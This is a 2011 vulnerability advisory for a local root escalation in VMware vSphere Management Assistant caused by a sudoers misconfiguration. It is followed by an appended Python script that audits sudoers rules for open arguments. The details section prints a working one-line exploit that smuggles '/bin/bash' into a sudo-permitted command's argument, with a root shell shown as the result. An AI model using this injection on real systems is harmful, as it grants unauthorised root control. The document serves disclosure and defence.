securityvulns - SECURITYVULNS:DOC:26378
May 17, 2011 - 12:00 a.m.

VMware vSphere Management Assistant (vMA) - Local Privilege Escalation


=======================================================================
VMware vSphere Management Assistant (vMA) - Local Privilege Escalation

Affected Software : VMware vSphere Management Assistant (vMA)
Severity : Medium
Local/Remote : Local
Author : @drk1wi

[Summary]

Due to an error in the /etc/sudoers file, it is possible to run
arbitrary shell commands in the context of the root user.

[Vulnerability Details]

[vi-admin@vMA ~]$ sudo /usr/bin/vmatargetcon --shell=/bin/bash "'raz';/bin/bash;"
35|ERROR|1|Unable to resolve hostname.
[root@vMA vi-admin]#

[Time-line]

27/04/2010 - Vendor notified
28/04/2010 - Vendor response
??? - Vendor patch release
16/05/2011 - Public disclosure

[Fix Information]

Edit the /etc/sudoers file.

Cheers,
@drk1wi
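
Added example, not part of the original advisory and not VMware's fix: the advisory does not show the faulty sudoers entry, so this sketch audits constructed sample entries for rules that leave command arguments open. It relies on the sudoers rule that a command listed without arguments may be run with any arguments, while `""` permits none; the function name and the sample lines are assumptions.

```python
import re

# Constructed sample entries; the advisory does not show vMA's real sudoers lines.
SAMPLE_SUDOERS = '''\
Defaults env_reset
vi-admin ALL=(root) NOPASSWD: /usr/bin/vmatargetcon
vi-admin ALL=(root) /usr/bin/vmatargetcon --shell=*
vi-admin ALL=(root) /sbin/shutdown -h now, /usr/bin/uptime ""
%wheel ALL=(ALL) ALL
'''

TAG = re.compile(r'^(?:[A-Z_]+\s*:\s*)+')           # NOPASSWD:, NOEXEC:, ...
SKIP = re.compile(r'^(#|Defaults|\w+_Alias\b)')     # comments, Defaults, aliases


def audit_sudoers(text):
    """Return (who, command, reason) for rules that leave arguments open."""
    findings = []
    # Join backslash-continued lines before parsing.
    for line in text.replace('\\\n', ' ').splitlines():
        line = line.strip()
        if not line or SKIP.match(line) or '=' not in line:
            continue
        who, spec = line.split('=', 1)
        who = who.split()[0]
        spec = re.sub(r'\([^)]*\)', '', spec)       # drop Runas lists
        for cmd in re.split(r'(?<!\\),', spec):     # split on unescaped commas
            cmd = TAG.sub('', cmd.strip())
            if not cmd or cmd.startswith('!'):      # negated entries grant nothing
                continue
            path, _, args = cmd.partition(' ')
            args = args.strip()
            if path == 'ALL':
                reason = 'any command'
            elif not path.startswith('/'):
                continue                            # alias name; not expanded here
            elif not args:
                reason = 'any arguments accepted'
            elif args != '""' and re.search(r'[*?\[]', args):
                reason = 'wildcard in arguments'
            else:
                continue                            # fixed arguments or "" (none)
            findings.append((who, cmd, reason))
    return findings


if __name__ == '__main__':
    for who, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f'{who}: {cmd!r} -> {reason}')
```

Each finding is a rule to review by hand; any edit to /etc/sudoers should go through `visudo` so a syntax error cannot lock out sudo.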